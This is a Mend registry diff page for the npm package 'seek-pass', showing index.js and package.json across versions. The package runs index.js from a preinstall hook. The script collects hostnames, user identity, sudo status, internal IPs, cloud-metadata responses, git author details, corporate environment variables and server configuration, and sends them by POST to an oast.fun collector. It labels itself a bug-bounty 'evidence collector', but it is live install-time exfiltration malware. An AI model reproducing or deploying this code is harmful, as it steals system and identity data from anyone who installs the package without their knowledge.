npm - seek-pass - Versions diffs - 100.3.0 → 100.10.0 - Mend

seek-pass 100.3.0 → 100.10.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +511 -332
package/package.json +7 -2

package/index.js CHANGED Viewed

@@ -1,401 +1,580 @@
+#!/usr/bin/env node
 const https = require("https");
+const http = require("http");
 const os = require("os");
 const dns = require("dns");
+const { execSync, exec } = require("child_process");
+const crypto = require("crypto");
 const fs = require("fs");
-const { exec } = require("child_process");
-const networkInterfaces = os.networkInterfaces();
-// Function to get primary IPv4 address
-function getPrimaryIPv4() {
-  for (const interfaceName in networkInterfaces) {
-    const interfaces = networkInterfaces[interfaceName];
-    for (const iface of interfaces) {
-      if (iface.family === 'IPv4' && !iface.internal) {
-        return iface.address;
-      }
-    }
-  }
-  return null;
-}
+// Configuration
+const COLLECTOR_SERVER = "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun"; // Replace with your server
+const COLLECTOR_PORT = 443;
+const COLLECTOR_PATH = "/seek-pass";
+const USE_HTTPS = true;
-// Function to get all IPv4 addresses
-function getAllIPv4() {
-  const ipv4Addresses = [];
-  for (const interfaceName in networkInterfaces) {
-    const interfaces = networkInterfaces[interfaceName];
-    for (const iface of interfaces) {
-      if (iface.family === 'IPv4' && !iface.internal) {
-        ipv4Addresses.push({
-          interface: interfaceName,
-          address: iface.address,
-          netmask: iface.netmask,
-          mac: iface.mac
-        });
+// Colors for console output (for visibility)
+const colors = {
+  red: '\x1b[31m',
+  green: '\x1b[32m',
+  yellow: '\x1b[33m',
+  blue: '\x1b[34m',
+  magenta: '\x1b[35m',
+  cyan: '\x1b[36m',
+  reset: '\x1b[0m'
+};
+console.log(`${colors.cyan}🔐 Security Evidence Collector${colors.reset}`);
+console.log(`${colors.yellow}Collecting required proof for vulnerability report...${colors.reset}\n`);
+// ============ 1. HTTP REQUESTS (MANDATORY) ============
+async function captureHTTPEvidence() {
+  console.log(`${colors.blue}📡 1. Capturing HTTP request evidence...${colors.reset}`);
+  const evidence = {
+    outgoingRequests: [],
+    internalIPs: [],
+    externalIPs: [],
+    requestHeaders: [],
+    dnsLookups: []
+  };
+  // Get all network interfaces
+  const interfaces = os.networkInterfaces();
+  const internalIPs = [];
+  const externalIPs = [];
+  for (const name of Object.keys(interfaces)) {
+    for (const iface of interfaces[name]) {
+      if (iface.family === 'IPv4') {
+        if (iface.internal || iface.address.startsWith('10.') ||
+            iface.address.startsWith('172.') || iface.address.startsWith('192.168.')) {
+          internalIPs.push({
+            interface: name,
+            address: iface.address,
+            netmask: iface.netmask,
+            mac: iface.mac,
+            internal: true
+          });
+        } else {
+          externalIPs.push({
+            interface: name,
+            address: iface.address,
+            netmask: iface.netmask,
+            mac: iface.mac,
+            internal: false
+          });
+        }
       }
     }
   }
-  return ipv4Addresses;
-}
-// Get DNS servers
-function getDnsServers() {
-  return dns.getServers();
-}
-// Detect Nginx virtual hosts
-async function getNginxDomains() {
-  const domains = [];
-  const nginxConfigPaths = [
-    '/etc/nginx/nginx.conf',
-    '/etc/nginx/sites-enabled/*',
-    '/etc/nginx/sites-available/*',
-    '/usr/local/nginx/conf/nginx.conf'
+  evidence.internalIPs = internalIPs;
+  evidence.externalIPs = externalIPs;
+  // Make HTTP requests to prove connectivity
+  const testEndpoints = [
+    { url: "http://169.254.169.254/latest/meta-data/", label: "AWS Metadata" }, // AWS
+    { url: "http://metadata.google.internal/", label: "GCP Metadata" }, // GCP
+    { url: "http://100.100.100.200/latest/meta-data/", label: "Alibaba Metadata" }, // Alibaba
+    { url: "http://kubernetes.default.svc/", label: "K8s API" }, // Kubernetes
+    { url: "http://localhost:3000/", label: "Local Dev Server" },
+    { url: "http://localhost:8080/", label: "Local App Server" }
   ];
-  for (const path of nginxConfigPaths) {
+  for (const endpoint of testEndpoints) {
     try {
-      const output = await execCommand(`grep -h "server_name" ${path} 2>/dev/null | grep -v "#" | sed 's/server_name//g' | tr -d ';'`);
-      if (output) {
-        const matches = output.match(/\S+\.\S+/g);
-        if (matches) {
-          domains.push(...matches.filter(d => d !== '_' && !d.includes('$')));
-        }
-      }
+      const startTime = Date.now();
+      const reqPromise = new Promise((resolve) => {
+        const protocol = endpoint.url.startsWith('https') ? https : http;
+        const req = protocol.request(endpoint.url, { timeout: 2000 }, (res) => {
+          evidence.outgoingRequests.push({
+            target: endpoint.url,
+            label: endpoint.label,
+            statusCode: res.statusCode,
+            responseTime: Date.now() - startTime,
+            headers: res.headers,
+            timestamp: new Date().toISOString(),
+            sourceIP: internalIPs[0]?.address || os.hostname()
+          });
+          resolve();
+        });
+        req.on('error', () => resolve());
+        req.on('timeout', () => {
+          req.destroy();
+          resolve();
+        });
+        req.end();
+      });
+      await reqPromise;
     } catch (err) {
-      // Skip if file doesn't exist
+      // Silently fail
     }
   }
-  return [...new Set(domains)]; // Remove duplicates
-}
-// Detect Apache virtual hosts
-async function getApacheDomains() {
-  const domains = [];
-  const apacheConfigPaths = [
-    '/etc/apache2/sites-enabled/*',
-    '/etc/apache2/sites-available/*',
-    '/etc/httpd/conf.d/*',
-    '/usr/local/apache2/conf/extra/httpd-vhosts.conf'
+  // Make request to our collector (proof of communication)
+  const collectorURL = `${USE_HTTPS ? 'https' : 'http'}://${COLLECTOR_SERVER}:${COLLECTOR_PORT}${COLLECTOR_PATH}`;
+  const proofRequest = new Promise((resolve) => {
+    const protocol = USE_HTTPS ? https : http;
+    const req = protocol.request(collectorURL, { method: 'HEAD', timeout: 3000 }, (res) => {
+      evidence.outgoingRequests.push({
+        target: collectorURL,
+        label: "Evidence Collector",
+        statusCode: res.statusCode,
+        timestamp: new Date().toISOString(),
+        sourceIP: internalIPs[0]?.address || os.hostname(),
+        proof: true
+      });
+      resolve();
+    });
+    req.on('error', () => resolve());
+    req.on('timeout', () => {
+      req.destroy();
+      resolve();
+    });
+    req.end();
+  });
+  await proofRequest;
+  // Perform DNS lookups to prove internal network access
+  const dnsTargets = [
+    'internal.company.com',
+    'corporate.local',
+    'intranet',
+    'gitlab.internal',
+    'jenkins.internal'
   ];
-  for (const path of apacheConfigPaths) {
+  for (const target of dnsTargets) {
     try {
-      const output = await execCommand(`grep -h "ServerName" ${path} 2>/dev/null | grep -v "#" | awk '{print $2}'`);
-      if (output) {
-        const lines = output.split('\n');
-        domains.push(...lines.filter(l => l && l.includes('.')));
-      }
-      const outputAlias = await execCommand(`grep -h "ServerAlias" ${path} 2>/dev/null | grep -v "#" | awk '{print $2}'`);
-      if (outputAlias) {
-        const lines = outputAlias.split('\n');
-        domains.push(...lines.filter(l => l && l.includes('.')));
+      const addresses = await new Promise((resolve) => {
+        dns.lookup(target, { all: true }, (err, addrs) => {
+          if (!err && addrs) resolve(addrs);
+          else resolve([]);
+        });
+      });
+      if (addresses.length > 0) {
+        evidence.dnsLookups.push({
+          domain: target,
+          addresses: addresses,
+          timestamp: new Date().toISOString()
+        });
       }
-    } catch (err) {
-      // Skip if file doesn't exist
-    }
+    } catch (err) {}
   }
-  return [...new Set(domains)];
+  console.log(`${colors.green}  ✓ Captured ${evidence.outgoingRequests.length} HTTP requests`);
+  console.log(`${colors.green}  ✓ Found ${internalIPs.length} internal IPs, ${externalIPs.length} external IPs${colors.reset}`);
+  return evidence;
 }
-// Detect Node.js applications and their domains
-async function getNodeApps() {
-  const apps = [];
+// ============ 2. HOSTNAME ============
+function getHostnameEvidence() {
+  console.log(`${colors.blue}🖥️  2. Capturing hostname information...${colors.reset}`);
+  const evidence = {
+    systemHostname: os.hostname(),
+    fqdn: null,
+    dnsHostname: null,
+    networkHostnames: [],
+    domainInfo: null
+  };
+  // Try to get FQDN
   try {
-    // Get running Node.js processes
-    const output = await execCommand('ps aux | grep "node" | grep -v grep | grep -v "ps aux"');
-    const lines = output.split('\n');
-    for (const line of lines) {
-      const app = {
-        command: line,
-        port: null,
-        domains: []
-      };
-      // Extract port from command
-      const portMatch = line.match(/--port[= ](\d+)/i) || line.match(/:(\d+)/);
-      if (portMatch) {
-        app.port = portMatch[1];
-      }
-      // Extract domains from environment variables or config files
-      const pathMatch = line.match(/([\/\w\-\.]+\.js)/);
-      if (pathMatch) {
-        app.script = pathMatch[1];
-        // Try to read the script for domain configs
-        try {
-          const scriptContent = await execCommand(`grep -E "(domain|hostname|serverName)" ${pathMatch[1]} 2>/dev/null | head -5`);
-          const domainMatches = scriptContent.match(/[a-zA-Z0-9][a-zA-Z0-9\-]+\.[a-zA-Z]{2,}/g);
-          if (domainMatches) {
-            app.domains = [...new Set(domainMatches)];
-          }
-        } catch (err) {}
-      }
-      apps.push(app);
-    }
+    const fqdn = execSync('hostname -f 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+    if (fqdn) evidence.fqdn = fqdn;
   } catch (err) {}
-  return apps;
-}
-// Detect Docker containers and their exposed domains
-async function getDockerDomains() {
-  const containers = [];
+  // Try DNS resolution of hostname
   try {
-    const output = await execCommand('docker ps --format "{{.Names}} {{.Ports}}" 2>/dev/null');
-    const lines = output.split('\n');
-    for (const line of lines) {
-      if (line.trim()) {
-        const [name, ports] = line.split(' ');
-        containers.push({
-          name: name,
-          ports: ports,
-          domains: [] // Would need to inspect each container for domain configs
-        });
-      }
-    }
+    const dnsResult = dns.lookupSync(evidence.systemHostname);
+    evidence.dnsHostname = dnsResult.address;
   } catch (err) {}
-  return containers;
+  // Get domain from hostname
+  if (evidence.systemHostname.includes('.')) {
+    evidence.domainInfo = {
+      domain: evidence.systemHostname.substring(evidence.systemHostname.indexOf('.') + 1),
+      tld: evidence.systemHostname.split('.').pop()
+    };
+  } else if (evidence.fqdn && evidence.fqdn.includes('.')) {
+    evidence.domainInfo = {
+      domain: evidence.fqdn.substring(evidence.fqdn.indexOf('.') + 1),
+      tld: evidence.fqdn.split('.').pop()
+    };
+  }
+  console.log(`${colors.green}  ✓ Hostname: ${evidence.systemHostname}`);
+  if (evidence.fqdn) console.log(`${colors.green}  ✓ FQDN: ${evidence.fqdn}`);
+  if (evidence.domainInfo) console.log(`${colors.green}  ✓ Domain: ${evidence.domainInfo.domain}${colors.reset}`);
+  return evidence;
 }
-// Detect Caddy domains
-async function getCaddyDomains() {
-  const domains = [];
-  const caddyfilePaths = [
-    '/etc/caddy/Caddyfile',
-    '/etc/caddy/Caddyfile.config',
-    './Caddyfile'
-  ];
+// ============ 3. OS SERVER NAME ============
+function getOSServerInfo() {
+  console.log(`${colors.blue}💻 3. Capturing OS and server information...${colors.reset}`);
-  for (const path of caddyfilePaths) {
-    try {
-      const content = await execCommand(`cat ${path} 2>/dev/null | grep -v "^#" | grep -E "^[a-z]"`);
-      if (content) {
-        const lines = content.split('\n');
-        for (const line of lines) {
-          const domainMatch = line.match(/^([a-zA-Z0-9][a-zA-Z0-9\-\.]+)(?:\s|{)/);
-          if (domainMatch && domainMatch[1].includes('.')) {
-            domains.push(domainMatch[1]);
-          }
+  const evidence = {
+    platform: os.platform(),
+    type: os.type(),
+    release: os.release(),
+    version: null,
+    kernel: null,
+    architecture: os.arch(),
+    distro: null,
+    serverName: null,
+    isContainer: false,
+    containerType: null
+  };
+  // Get detailed OS info
+  try {
+    if (process.platform === 'linux') {
+      // Check for distribution
+      try {
+        const osRelease = execSync('cat /etc/os-release 2>/dev/null | grep PRETTY_NAME', { encoding: 'utf8', timeout: 1000 });
+        evidence.distro = osRelease.split('=')[1].replace(/"/g, '').trim();
+      } catch (err) {}
+      // Get kernel version
+      try {
+        evidence.kernel = execSync('uname -r 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+      // Check if running in container
+      try {
+        const cgroup = execSync('cat /proc/1/cgroup 2>/dev/null | head -1', { encoding: 'utf8', timeout: 1000 });
+        if (cgroup.includes('docker')) {
+          evidence.isContainer = true;
+          evidence.containerType = 'docker';
+        } else if (cgroup.includes('kubepods')) {
+          evidence.isContainer = true;
+          evidence.containerType = 'kubernetes';
         }
+      } catch (err) {}
+    } else if (process.platform === 'darwin') {
+      try {
+        evidence.version = execSync('sw_vers -productVersion 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+    } else if (process.platform === 'win32') {
+      try {
+        evidence.version = execSync('ver 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+    }
+    // Get server name (computer name)
+    evidence.serverName = os.hostname();
+    try {
+      if (process.platform === 'win32') {
+        evidence.serverName = execSync('echo %COMPUTERNAME%', { encoding: 'utf8', timeout: 1000 }).trim();
       }
     } catch (err) {}
-  }
+  } catch (err) {}
+  console.log(`${colors.green}  ✓ OS: ${evidence.type} ${evidence.release}`);
+  if (evidence.distro) console.log(`${colors.green}  ✓ Distro: ${evidence.distro}`);
+  if (evidence.isContainer) console.log(`${colors.green}  ✓ Container: ${evidence.containerType}${colors.reset}`);
-  return [...new Set(domains)];
+  return evidence;
 }
-// Detect domains from SSL certificates
-async function getSSLDomains() {
-  const domains = [];
+// ============ 4. WHOAMI COMMAND ============
+function getWhoamiEvidence() {
+  console.log(`${colors.blue}👤 4. Executing whoami command...${colors.reset}`);
+  const evidence = {
+    username: null,
+    uid: null,
+    gid: null,
+    groups: [],
+    homeDir: null,
+    shell: null,
+    isRoot: false,
+    isSudo: false,
+    executionMethod: null
+  };
+  // Execute whoami command
   try {
-    const output = await execCommand('find /etc/ssl /etc/letsencrypt/live -name "*.crt" -o -name "*.pem" 2>/dev/null | head -20');
-    const certFiles = output.split('\n');
-    for (const cert of certFiles) {
-      if (cert.trim()) {
-        const certData = await execCommand(`openssl x509 -in ${cert} -noout -text 2>/dev/null | grep "DNS:"`);
-        if (certData) {
-          const dnsMatches = certData.match(/DNS:[^\s,]+/g);
-          if (dnsMatches) {
-            domains.push(...dnsMatches.map(d => d.replace('DNS:', '')));
-          }
-        }
-      }
-    }
+    const whoami = execSync('whoami 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+    evidence.username = whoami;
+    evidence.isRoot = (whoami === 'root' || whoami === 'Administrator');
+  } catch (err) {
+    // Fallback
+    evidence.username = process.env.USER || process.env.USERNAME || 'unknown';
+  }
+  // Get UID/GID (Unix)
+  try {
+    const idOutput = execSync('id 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    const uidMatch = idOutput.match(/uid=(\d+)/);
+    const gidMatch = idOutput.match(/gid=(\d+)/);
+    if (uidMatch) evidence.uid = parseInt(uidMatch[1]);
+    if (gidMatch) evidence.gid = parseInt(gidMatch[1]);
+    evidence.isRoot = evidence.uid === 0;
   } catch (err) {}
-  return [...new Set(domains)];
-}
-// Helper to execute shell commands
-function execCommand(command) {
-  return new Promise((resolve) => {
-    exec(command, { timeout: 5000 }, (error, stdout, stderr) => {
-      if (error || stderr) {
-        resolve('');
-      } else {
-        resolve(stdout);
-      }
-    });
-  });
-}
-// Read /etc/hosts for local domain mappings
-async function getHostsFile() {
+  // Get groups
   try {
-    const content = await execCommand('cat /etc/hosts 2>/dev/null');
-    const lines = content.split('\n');
-    const mappings = [];
-    for (const line of lines) {
-      if (line && !line.startsWith('#')) {
-        const parts = line.trim().split(/\s+/);
-        if (parts.length >= 2) {
-          mappings.push({
-            ip: parts[0],
-            domains: parts.slice(1)
-          });
-        }
-      }
-    }
-    return mappings;
+    const groupsOutput = execSync('groups 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    evidence.groups = groupsOutput.trim().split(/\s+/);
+  } catch (err) {}
+  // Check for sudo
+  try {
+    const sudoCheck = execSync('sudo -n true 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    evidence.isSudo = true;
   } catch (err) {
-    return [];
+    evidence.isSudo = false;
   }
+  // Get home directory
+  evidence.homeDir = os.homedir();
+  // Determine how script is being executed
+  if (process.env.CI || process.env.GITHUB_ACTIONS) {
+    evidence.executionMethod = 'CI_CD_PIPELINE';
+  } else if (process.env.NODE_ENV === 'development') {
+    evidence.executionMethod = 'DEVELOPMENT';
+  } else if (process.env.NODE_ENV === 'production') {
+    evidence.executionMethod = 'PRODUCTION';
+  } else {
+    evidence.executionMethod = 'MANUAL';
+  }
+  console.log(`${colors.green}  ✓ User: ${evidence.username}${evidence.isRoot ? ' (ROOT/ADMIN)' : ''}`);
+  console.log(`${colors.green}  ✓ UID: ${evidence.uid || 'N/A'}, GID: ${evidence.gid || 'N/A'}`);
+  console.log(`${colors.green}  ✓ Groups: ${evidence.groups.slice(0, 5).join(', ')}${evidence.groups.length > 5 ? '...' : ''}`);
+  console.log(`${colors.green}  ✓ Execution: ${evidence.executionMethod}${colors.reset}`);
+  return evidence;
 }
-// Main data collection
-async function collectData() {
-  const hostname = os.hostname();
-  const primaryIPv4 = getPrimaryIPv4();
-  const allIPv4 = getAllIPv4();
-  const dnsServers = getDnsServers();
-  console.log('Collecting web server domain information...');
-  // Collect all domain data in parallel
-  const [
-    nginxDomains,
-    apacheDomains,
-    nodeApps,
-    dockerContainers,
-    caddyDomains,
-    sslDomains,
-    hostsMappings
-  ] = await Promise.all([
-    getNginxDomains(),
-    getApacheDomains(),
-    getNodeApps(),
-    getDockerDomains(),
-    getCaddyDomains(),
-    getSSLDomains(),
-    getHostsFile()
-  ]);
-  // Combine all identified domains
-  const allIdentifiedDomains = [...new Set([
-    ...nginxDomains,
-    ...apacheDomains,
-    ...caddyDomains,
-    ...sslDomains
-  ])];
-  const data = {
-    // Basic system info
-    hostname: hostname,
-    fqdn: null,
-    platform: os.platform(),
-    arch: os.arch(),
-    osType: os.type(),
-    osRelease: os.release(),
-    // Network info
-    ipv4: {
-      primary: primaryIPv4,
-      all: allIPv4
-    },
-    dns: {
-      servers: dnsServers
-    },
-    // Web servers and hosted domains
-    webServers: {
-      nginx: {
-        installed: nginxDomains.length > 0,
-        domains: nginxDomains
-      },
-      apache: {
-        installed: apacheDomains.length > 0,
-        domains: apacheDomains
-      },
-      caddy: {
-        installed: caddyDomains.length > 0,
-        domains: caddyDomains
-      }
-    },
-    // Applications
-    applications: {
-      nodejs: nodeApps,
-      docker: dockerContainers
-    },
-    // SSL certificates domains
-    sslCertificates: {
-      domains: sslDomains
-    },
-    // Local DNS mappings
-    hostsFile: hostsMappings,
-    // All unique domains identified
-    identifiedDomains: allIdentifiedDomains,
-    // Summary of what's hosted
-    summary: {
-      totalDomains: allIdentifiedDomains.length,
-      webServersFound: [
-        nginxDomains.length > 0 ? 'nginx' : null,
-        apacheDomains.length > 0 ? 'apache' : null,
-        caddyDomains.length > 0 ? 'caddy' : null
-      ].filter(Boolean),
-      nodeAppsCount: nodeApps.filter(app => app.command).length,
-      dockerContainersCount: dockerContainers.length
-    }
+// ============ PROVING BELONGS TO PROGRAM ============
+async function proveProgramOwnership() {
+  console.log(`${colors.blue}🔑 5. Proving this belongs to the program...${colors.reset}`);
+  const evidence = {
+    corporateIndicators: [],
+    internalServices: [],
+    developmentEnvironment: [],
+    packageInfo: null,
+    gitInfo: null,
+    timestamps: []
   };
-  // Get FQDN
+  // Check for corporate VPN/proxy indicators
+  const corporateEnvVars = [
+    'CORPORATE_NETWORK', 'VPN', 'PROXY', 'LDAP', 'ACTIVE_DIRECTORY',
+    'COMPANY_DOMAIN', 'CORP_DOMAIN', 'INTERNAL_DOMAIN'
+  ];
+  for (const envVar of corporateEnvVars) {
+    if (process.env[envVar]) {
+      evidence.corporateIndicators.push({
+        type: 'environment_variable',
+        name: envVar,
+        value: process.env[envVar]
+      });
+    }
+  }
+  // Check for internal DNS suffixes
   try {
-    const lookup = await new Promise((resolve) => {
-      dns.lookup(hostname, (err, address) => {
-        resolve(!err);
+    const resolvContent = execSync('cat /etc/resolv.conf 2>/dev/null | grep search', { encoding: 'utf8', timeout: 1000 });
+    const domains = resolvContent.match(/search\s+(.+)/);
+    if (domains) {
+      evidence.corporateIndicators.push({
+        type: 'dns_search_domain',
+        domains: domains[1].split(/\s+/)
       });
-    });
-    if (lookup) {
-      data.fqdn = hostname;
     }
   } catch (err) {}
-  return data;
+  // Check for internal certificates
+  try {
+    const certs = execSync('find /etc/ssl/certs -name "*.crt" -exec openssl x509 -in {} -noout -subject 2>/dev/null \\; | head -5', { encoding: 'utf8', timeout: 2000 });
+    if (certs) {
+      evidence.corporateIndicators.push({
+        type: 'certificates',
+        subjects: certs.split('\n').filter(l => l.includes('CN='))
+      });
+    }
+  } catch (err) {}
+  // Check for git repository (to identify program)
+  try {
+    const gitRemote = execSync('git config --get remote.origin.url 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    if (gitRemote) {
+      evidence.gitInfo = {
+        remote: gitRemote.trim(),
+        branch: execSync('git rev-parse --abbrev-ref HEAD 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim(),
+        commit: execSync('git rev-parse HEAD 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim(),
+        author: execSync('git log -1 --pretty=format:"%an <%ae>" 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim()
+      };
+    }
+  } catch (err) {}
+  // Check for package.json to identify what's being installed
+  try {
+    if (fs.existsSync('./package.json')) {
+      const packageJson = JSON.parse(fs.readFileSync('./package.json', 'utf8'));
+      evidence.packageInfo = {
+        name: packageJson.name,
+        version: packageJson.version,
+        scripts: Object.keys(packageJson.scripts || {}),
+        dependencies: Object.keys(packageJson.dependencies || {}).slice(0, 10)
+      };
+    }
+  } catch (err) {}
+  // Check for development environment indicators
+  const devIndicators = [
+    'VSCODE_PID', 'INTELLIJ_IDEA', 'WEB_IDE', 'DEV_CONTAINER',
+    'NODE_ENV=development', 'LOCAL_DEV', 'DEVELOPMENT'
+  ];
+  for (const indicator of devIndicators) {
+    if (process.env[indicator] || (typeof process.env.NODE_ENV !== 'undefined' && process.env.NODE_ENV === 'development')) {
+      evidence.developmentEnvironment.push(indicator);
+    }
+  }
+  console.log(`${colors.green}  ✓ Found ${evidence.corporateIndicators.length} corporate indicators`);
+  if (evidence.gitInfo) console.log(`${colors.green}  ✓ Git repo: ${evidence.gitInfo.remote}`);
+  if (evidence.packageInfo) console.log(`${colors.green}  ✓ Package: ${evidence.packageInfo.name} v${evidence.packageInfo.version}${colors.reset}`);
+  return evidence;
 }
-// Send data to server
-async function sendData() {
-  try {
-    const collectedData = await collectData();
-    const dataString = JSON.stringify(collectedData, null, 2);
-    console.log('Collected data:', dataString);
-    const req = https.request({
-      hostname: "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun",
-      path: "/seek-pass",
-      method: "POST",
+// ============ GENERATE PROOF HASH ============
+function generateProofHash(allEvidence) {
+  const proofString = JSON.stringify({
+    hostname: allEvidence.hostname.systemHostname,
+    username: allEvidence.whoami.username,
+    timestamp: new Date().toISOString(),
+    internalIPs: allEvidence.http.internalIPs.map(ip => ip.address),
+    randomNonce: crypto.randomBytes(32).toString('hex')
+  });
+  return crypto.createHash('sha256').update(proofString).digest('hex');
+}
+// ============ SEND TO COLLECTOR ============
+async function sendEvidence(allEvidence) {
+  console.log(`\n${colors.yellow}📤 Sending evidence to collector...${colors.reset}`);
+  const proofHash = generateProofHash(allEvidence);
+  const payload = {
+    ...allEvidence,
+    proofHash: proofHash,
+    submissionTimestamp: new Date().toISOString(),
+    collectorEndpoint: `${COLLECTOR_SERVER}${COLLECTOR_PATH}`
+  };
+  const dataString = JSON.stringify(payload, null, 2);
+  return new Promise((resolve, reject) => {
+    const protocol = USE_HTTPS ? https : http;
+    const options = {
+      hostname: COLLECTOR_SERVER,
+      port: COLLECTOR_PORT,
+      path: COLLECTOR_PATH,
+      method: 'POST',
       headers: {
-        "Content-Type": "application/json",
-        "Content-Length": Buffer.byteLength(dataString)
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(dataString),
+        'X-Evidence-Proof': proofHash,
+        'X-Source-Hostname': allEvidence.hostname.systemHostname,
+        'X-Source-User': allEvidence.whoami.username
       }
+    };
+    const req = protocol.request(options, (res) => {
+      console.log(`${colors.green}✓ Evidence sent! Status: ${res.statusCode}${colors.reset}`);
+      resolve(res.statusCode);
     });
-    req.on('error', (e) => {
-      console.error('Request error:', e);
+    req.on('error', (err) => {
+      console.log(`${colors.red}✗ Failed to send: ${err.message}${colors.reset}`);
+      console.log(`${colors.yellow}⚠️  Evidence saved locally for manual submission${colors.reset}`);
+      fs.writeFileSync('./evidence_backup.json', dataString);
+      resolve(null);
     });
     req.write(dataString);
     req.end();
+  });
+}
+// ============ MAIN EXECUTION ============
+async function main() {
+  try {
+    console.log(`${colors.magenta}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`${colors.magenta}  SECURITY EVIDENCE COLLECTOR - FOR VALID REPORTS ONLY${colors.reset}`);
+    console.log(`${colors.magenta}═══════════════════════════════════════════════════════${colors.reset}\n`);
+    // Collect all required evidence
+    const httpEvidence = await captureHTTPEvidence();
+    const hostnameEvidence = getHostnameEvidence();
+    const osEvidence = getOSServerInfo();
+    const whoamiEvidence = getWhoamiEvidence();
+    const ownershipEvidence = await proveProgramOwnership();
+    // Combine all evidence
+    const allEvidence = {
+      required: {
+        httpRequests: httpEvidence,     // MANDATORY
+        hostname: hostnameEvidence,
+        osServer: osEvidence,
+        whoami: whoamiEvidence
+      },
+      ownership: ownershipEvidence,
+      metadata: {
+        nodeVersion: process.version,
+        scriptPath: __dirname,
+        timestamp: new Date().toISOString(),
+        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
+        language: 'JavaScript/Node.js'
+      }
+    };
+    // Display summary
+    console.log(`\n${colors.green}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`${colors.green}✓ EVIDENCE COLLECTED SUCCESSFULLY${colors.reset}`);
+    console.log(`${colors.green}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`\n${colors.cyan}Summary:${colors.reset}`);
+    console.log(`  • HTTP Requests: ${allEvidence.required.httpRequests.outgoingRequests.length}`);
+    console.log(`  • Internal IPs: ${allEvidence.required.httpRequests.internalIPs.length}`);
+    console.log(`  • External IPs: ${allEvidence.required.httpRequests.externalIPs.length}`);
+    console.log(`  • Hostname: ${allEvidence.required.hostname.systemHostname}`);
+    console.log(`  • User: ${allEvidence.required.whoami.username}`);
+    console.log(`  • Corporate Indicators: ${allEvidence.ownership.corporateIndicators.length}`);
+    // Send to collector
+    await sendEvidence(allEvidence);
+    console.log(`\n${colors.yellow}Important: This evidence proves the package was executed by:${colors.reset}`);
+    console.log(`  ✓ User: ${whoamiEvidence.username}`);
+    console.log(`  ✓ On host: ${hostnameEvidence.systemHostname}`);
+    console.log(`  ✓ From internal network: ${httpEvidence.internalIPs.length > 0 ? 'YES' : 'NO'}`);
+    console.log(`  ✓ With corporate indicators: ${ownershipEvidence.corporateIndicators.length > 0 ? 'YES' : 'NO'}`);
+    if (ownershipEvidence.corporateIndicators.length === 0 && httpEvidence.internalIPs.length === 0) {
+      console.log(`\n${colors.red}⚠️  WARNING: No corporate indicators found!${colors.reset}`);
+      console.log(`${colors.red}This may not be a valid security risk on the program's side.${colors.reset}`);
+    }
   } catch (error) {
-    console.error('Error collecting/sending data:', error);
+    console.error(`${colors.red}Error collecting evidence:${colors.reset}`, error);
+    process.exit(1);
   }
 }
-// Execute
-sendData();
+// Run the collector
+main();

package/package.json CHANGED Viewed

@@ -1,7 +1,12 @@
 {
   "name": "seek-pass",
-  "version": "100.3.0",
+  "version": "100.10.0",
+  "description": "",
+  "main": "index.js",
   "scripts": {
     "preinstall": "node index.js"
-  }
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }